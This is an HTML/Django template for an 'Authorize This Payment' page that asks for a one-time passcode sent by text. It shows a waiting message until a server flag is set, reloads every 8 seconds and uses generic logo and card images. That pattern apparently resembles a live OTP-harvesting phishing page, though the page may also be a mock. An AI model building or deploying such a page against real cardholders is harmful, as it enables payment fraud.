<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Code Verification Text</title>
    <style>
            .p_tag {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-size: medium;
            font-weight: 300;

        }
        .label
        {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-weight: 500;

        }
.input
{
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-weight: 300;
            border-radius: 20px;
            margin-top: 10px;

}
#button
{
    border-radius: 20px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-weight: 300;
            font-size: medium;
            width: 150px;
            height: 40px;

            margin-top: 20px;

            color: white;
            background-color: black;
            border: none;
}
    </style>
</head>
<body>
{% if is_otp_received.is_otp_sent == False %}
<h4>OTP Code is Underway</h4>
{% else %}
<img style=" margin-left: 90px;height: 60px; width: 120px;" src="/static/assets/logo.png" />
    <br>
    <img style=" margin-left: 90px;height: 60px; width: 120px;" src="/static/assets/card.jpg" />
    <h3 style="font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;font-weight: 700;">Authorize This Payment</h3>
    <p class="p_tag">We have sent your one time passcode by text message,</br>please enter your one time passcode to confirm the payment</p>


    <form action="" method="post">
        {% csrf_token %}
        <label class="label" for="opt_code">Enter OTP:</label>
        <br>
        <input class="input" type="text" name="opt_code">
    <br>
    <button id="button" type="submit" name="btnAuthenticate">Authenticate</button>
</form>
{% endif %}
<script type="text/javascript">
    setTimeout(function () {
      location.reload();
    }, 8 * 1000);
</script>
</body>
</html>